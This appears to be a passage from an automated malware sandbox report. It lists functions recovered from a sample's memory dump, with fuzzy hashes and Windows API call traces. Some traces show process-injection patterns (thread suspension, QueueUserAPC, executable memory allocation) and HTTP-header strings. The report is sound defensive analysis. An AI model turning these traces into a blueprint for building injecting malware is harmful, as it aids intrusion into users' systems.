  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
